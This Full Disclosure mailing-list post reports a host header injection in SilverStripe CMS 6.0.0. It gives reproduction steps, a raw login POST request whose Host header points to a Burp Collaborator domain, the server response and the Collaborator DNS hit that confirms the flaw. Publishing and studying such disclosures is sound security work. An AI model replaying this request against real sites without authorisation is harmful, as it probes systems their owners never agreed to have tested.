Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Host Header Injection - silverstripecmsv6.0.0

From: Andrey Stoykov <mwebsec () gmail com>
Date: Sat, 23 Aug 2025 15:13:22 +0100
# Exploit Title: Host Header Injection - silverstripecmsv6.0.0
# Date: 08/2025
# Exploit Author: Andrey Stoykov
# Version: 6.0.0
# Tested on: Debian 12
# Blog:
https://msecureltd.blogspot.com/2025/08/friday-fun-pentest-series-39-host.html


Host Header Injection #1:

Steps to Reproduce:

- Login and change the Host header to Burp Collab domain
- Upon logging in the Collab would get a hit from the IP of the app


// HTTP Post Request

POST /Security/login/default/LoginForm HTTP/1.1
Host: 7ksb89bppmbvc3po6ma6x72n7ed51wtki.oastify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0)
Gecko/20100101 Firefox/142.0
[...]

AuthenticationMethod=SilverStripe%5CSecurity%5CMemberAuthenticator%5CMemberAuthenticator&Email=admin&Password=password&SecurityID=5afbb1fab346375510939ba7b65499e556b0251c&action_doLogin=Log+in


// HTTP Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Cache-Control: no-cache, no-store
[...]

<html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX,
NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta
name="viewport" content="initial-scale=1.0"><meta
http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body
style="margin:0px;height:100%"><iframe id="main-iframe"
src="/_Incapsula_Resource?CWUDNSAI=27&xinfo=1014-115438578-0%200NNN%20RT%281755353110306%2067%29%20q%280%20-1%20-1%20-1%29%20r%284%20-1%29&incident_id=0-468567604813498382&edet=22&cinfo=ffffffff&rpinfo=0&mth=POST"
frameborder=0 width="100%" height="100%" marginheight="0px"
marginwidth="0px">Request unsuccessful. Incapsula incident ID:
0-468567604813498382</iframe></body></html>


// Burp Collab domain hit

The Collaborator server received a DNS lookup of type CNAME for the domain
name www.7ksb89bppmbvc3po6ma6x72n7ed51wtki.oastify.com.
The lookup was received from IP address 149.126.76.44:7396 at 2025-Aug-16
14:05:10.562 UTC.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: